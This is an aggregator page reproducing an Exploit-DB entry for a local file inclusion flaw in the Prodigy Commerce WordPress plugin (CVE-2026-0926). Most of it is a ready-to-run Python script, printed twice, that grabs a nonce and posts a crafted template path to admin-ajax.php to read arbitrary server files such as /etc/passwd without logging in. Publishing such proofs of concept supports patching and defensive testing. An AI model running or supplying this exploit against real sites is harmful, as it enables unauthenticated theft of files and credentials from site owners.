Prodigy Commerce 3.3.0 – Local File Inclusion_EDB-ID:52598

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion Date: 23-05-2026 Exploit Author: Diamorphine Vendor Homepage: https://prodigycommerce.com/ Software Link: https://wordpress.org/plugins/prodigy-commerce/ Version: 3.2.9 Tested on: Debian CVE...

Visit Original Source

Basic Information

ID EDB-ID:52598

Published May 29, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://prodigycommerce.com/
# Software Link: https://wordpress.org/plugins/prodigy-commerce/
# Version: 3.2.9
# Tested on: Debian
# CVE : CVE-2026-0926
# Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.

import httpx
import asyncio
import re
from urllib.parse import urljoin
import argparse

def get_nonce(base_url):
with httpx.Client(verify=False) as client:
r = client.get(url=base_url)
match = re.search(r'var settings\s*=\s*{[^}]*"nonce":"([^"]+)"', r.text)
if match:
nonce = match.group(1)
return nonce
else:
print("Nonce not found")

async def main(base_url,file):
async with httpx.AsyncClient(verify=False) as client:
nonce = get_nonce(base_url)
data = {
"action": "prodigy-render-my-account-widget",
"nonce": nonce,
"parameters[template_name]": file,
"parameters[default_path]": "/"
}

url = urljoin(base_url, '/wp-admin/admin-ajax.php')
r = await client.post(url=url, data=data)
raw = r.json()
out = raw['data']
print(out['html'])

parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit")
parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd")
parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local")
args = parser.parse_args()

asyncio.run(main(args.url, args.file))

{
    "lastseen": "2026-05-29T11:29:17",
    "description": "Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion Date: 23-05-2026 Exploit Author: Diamorphine Vendor Homepage: https://prodigycommerce.com/ Software Link: https://wordpress.org/plugins/prodigy-commerce/ Version: 3.2.9 Tested on: Debian CVE...",
    "published": "2026-05-29T00:00:00",
    "modified": "2026-05-29T00:00:00",
    "type": "exploitdb",
    "title": "Prodigy Commerce 3.3.0 - Local File Inclusion",
    "source": "",
    "references": "",
    "id": "EDB-ID:52598",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-0926"
    ],
    "sourceData": "# Exploit Title: Prodigy Commerce  3.3.0 - Local File Inclusion \r\n# Date: 23-05-2026\r\n# Exploit Author: Diamorphine\r\n# Vendor Homepage: https://prodigycommerce.com/\r\n# Software Link: https://wordpress.org/plugins/prodigy-commerce/\r\n# Version: 3.2.9\r\n# Tested on: Debian\r\n# CVE : CVE-2026-0926\r\n# Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.\r\n\r\n\r\nimport httpx\r\nimport asyncio\r\nimport re\r\nfrom urllib.parse import urljoin\r\nimport argparse\r\n\r\n\r\ndef get_nonce(base_url):\r\n    with httpx.Client(verify=False) as client:\r\n        r = client.get(url=base_url)\r\n        match = re.search(r'var settings\\s*=\\s*{[^}]*\"nonce\":\"([^\"]+)\"', r.text)\r\n        if match:\r\n            nonce = match.group(1)\r\n            return nonce\r\n        else:\r\n            print(\"Nonce not found\")\r\n\r\nasync def main(base_url,file):\r\n    async with httpx.AsyncClient(verify=False) as client:\r\n        nonce = get_nonce(base_url)\r\n        data = {\r\n            \"action\": \"prodigy-render-my-account-widget\",\r\n            \"nonce\": nonce,\r\n            \"parameters[template_name]\": file,\r\n            \"parameters[default_path]\": \"/\"\r\n        }\r\n\r\n        url = urljoin(base_url, '/wp-admin/admin-ajax.php')\r\n        r = await client.post(url=url, data=data)\r\n        raw = r.json()\r\n        out = raw['data']\r\n        print(out['html'])\r\n\r\nparser = argparse.ArgumentParser(description=\"Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit\")\r\nparser.add_argument(\"-f\", \"--file\", default='/etc/passwd', help=\"File to read, default: /etc/passwd\")\r\nparser.add_argument(\"-u\", \"--url\", required=True, help=\"Target url, e.g. http://test.local\")\r\nargs = parser.parse_args()\r\n\r\nasyncio.run(main(args.url, args.file))",
    "sourceHref": "https://www.exploit-db.com/raw/52598",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52598",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply